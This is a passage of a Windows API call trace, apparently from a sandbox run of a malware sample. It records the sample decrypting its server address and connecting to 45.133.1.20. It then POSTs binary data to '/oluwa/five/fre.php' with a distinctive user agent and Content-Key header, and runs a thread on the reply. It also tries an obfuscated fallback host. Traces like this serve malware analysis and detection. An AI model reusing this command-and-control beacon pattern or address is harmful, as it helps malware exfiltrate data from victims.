lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0215.588] GetProcessHeap () returned 0x6a0000 [0215.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0215.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.591] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0215.606] GetProcessHeap () returned 0x6a0000 [0215.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0215.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.607] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0215.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.608] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.609] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.609] GetProcessHeap () returned 0x6a0000 [0215.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0215.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.613] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0215.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.614] CryptDestroyKey (hKey=0x6ad020) returned 1 [0215.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.616] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0215.616] GetProcessHeap () returned 0x6a0000 [0215.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0215.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.617] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0215.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.618] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0215.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.619] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0215.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.620] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0215.620] GetProcessHeap () returned 0x6a0000 [0215.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0215.620] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0215.620] GetProcessHeap () returned 0x6a0000 [0215.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0215.620] socket (af=2, type=1, protocol=6) returned 0x618 [0215.620] connect (s=0x618, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0215.653] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0215.653] GetProcessHeap () returned 0x6a0000 [0215.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0215.653] GetProcessHeap () returned 0x6a0000 [0215.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0215.654] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0215.656] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0215.656] GetProcessHeap () returned 0x6a0000 [0215.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0215.656] GetProcessHeap () returned 0x6a0000 [0215.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0215.657] GetProcessHeap () returned 0x6a0000 [0215.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0215.657] GetProcessHeap () returned 0x6a0000 [0215.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0215.657] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0215.658] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0215.658] GetProcessHeap () returned 0x6a0000 [0215.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0215.659] GetProcessHeap () returned 0x6a0000 [0215.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0215.659] send (s=0x618, buf=0x6b5c98*, len=242, flags=0) returned 242 [0215.660] send (s=0x618, buf=0x6bb998*, len=159, flags=0) returned 159 [0215.660] GetProcessHeap () returned 0x6a0000 [0215.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0215.660] recv (in: s=0x618, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0215.746] GetProcessHeap () returned 0x6a0000 [0215.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0215.746] GetProcessHeap () returned 0x6a0000 [0215.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0215.747] GetProcessHeap () returned 0x6a0000 [0215.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0215.748] GetProcessHeap () returned 0x6a0000 [0215.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0215.748] closesocket (s=0x618) returned 0 [0215.749] GetProcessHeap () returned 0x6a0000 [0215.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0215.749] GetProcessHeap () returned 0x6a0000 [0215.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0215.749] GetProcessHeap () returned 0x6a0000 [0215.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0215.749] GetProcessHeap () returned 0x6a0000 [0215.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0215.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe90) returned 0x618 [0215.751] Sleep (dwMilliseconds=0xea60) [0215.753] GetProcessHeap () returned 0x6a0000 [0215.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0215.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.756] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.768] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0215.774] GetProcessHeap () returned 0x6a0000 [0215.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0215.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.778] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0215.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.779] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.780] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.780] GetProcessHeap () returned 0x6a0000 [0215.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0215.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.781] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0215.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.782] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0215.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.783] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0215.783] GetProcessHeap () returned 0x6a0000 [0215.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0215.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.784] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.786] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.792] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.793] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.793] GetProcessHeap () returned 0x6a0000 [0215.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0215.794] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0215.794] GetProcessHeap () returned 0x6a0000 [0215.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0215.794] GetProcessHeap () returned 0x6a0000 [0215.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0215.795] GetProcessHeap () returned 0x6a0000 [0215.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0215.795] GetProcessHeap () returned 0x6a0000 [0215.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0215.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.796] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.805] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0215.813] GetProcessHeap () returned 0x6a0000 [0215.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0215.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.815] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0215.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.816] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.817] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.817] GetProcessHeap () returned 0x6a0000 [0215.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0215.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.818] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0215.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.819] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0215.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0215.821] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0215.821] GetProcessHeap () returned 0x6a0000 [0215.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0215.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.822] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0215.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.822] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0215.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.823] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0215.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0215.824] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0215.824] GetProcessHeap () returned 0x6a0000 [0215.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0215.824] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0215.824] GetProcessHeap () returned 0x6a0000 [0215.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0215.825] socket (af=2, type=1, protocol=6) returned 0x61c [0215.825] connect (s=0x61c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0215.856] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0215.856] GetProcessHeap () returned 0x6a0000 [0215.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0215.856] GetProcessHeap () returned 0x6a0000 [0215.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0215.857] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0215.859] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0215.859] GetProcessHeap () returned 0x6a0000 [0215.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0215.859] GetProcessHeap () returned 0x6a0000 [0215.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0215.860] GetProcessHeap () returned 0x6a0000 [0215.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0215.860] GetProcessHeap () returned 0x6a0000 [0215.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0215.861] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0215.862] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0215.862] GetProcessHeap () returned 0x6a0000 [0215.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0215.862] GetProcessHeap () returned 0x6a0000 [0215.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0215.863] send (s=0x61c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0215.863] send (s=0x61c, buf=0x6bb998*, len=159, flags=0) returned 159 [0215.863] GetProcessHeap () returned 0x6a0000 [0215.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0215.863] recv (in: s=0x61c, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0215.988] GetProcessHeap () returned 0x6a0000 [0215.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0215.989] GetProcessHeap () returned 0x6a0000 [0215.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0215.989] GetProcessHeap () returned 0x6a0000 [0215.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0215.990] GetProcessHeap () returned 0x6a0000 [0215.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0215.990] closesocket (s=0x61c) returned 0 [0215.991] GetProcessHeap () returned 0x6a0000 [0215.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0215.991] GetProcessHeap () returned 0x6a0000 [0215.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0215.992] GetProcessHeap () returned 0x6a0000 [0215.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0215.993] GetProcessHeap () returned 0x6a0000 [0215.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0215.993] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfa8) returned 0x61c [0215.997] Sleep (dwMilliseconds=0xea60) [0215.998] GetProcessHeap () returned 0x6a0000 [0215.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0215.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.000] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.058] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0216.124] GetProcessHeap () returned 0x6a0000 [0216.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0216.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.290] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0216.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.292] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.293] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.293] GetProcessHeap () returned 0x6a0000 [0216.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0216.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.297] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0216.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.298] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0216.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.300] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0216.300] GetProcessHeap () returned 0x6a0000 [0216.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0216.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.301] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0216.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.302] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0216.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.303] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0216.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.306] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0216.306] GetProcessHeap () returned 0x6a0000 [0216.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0216.306] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0216.307] GetProcessHeap () returned 0x6a0000 [0216.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0216.308] GetProcessHeap () returned 0x6a0000 [0216.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0216.309] GetProcessHeap () returned 0x6a0000 [0216.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0216.309] GetProcessHeap () returned 0x6a0000 [0216.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0216.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.310] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.336] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0216.347] GetProcessHeap () returned 0x6a0000 [0216.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0216.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 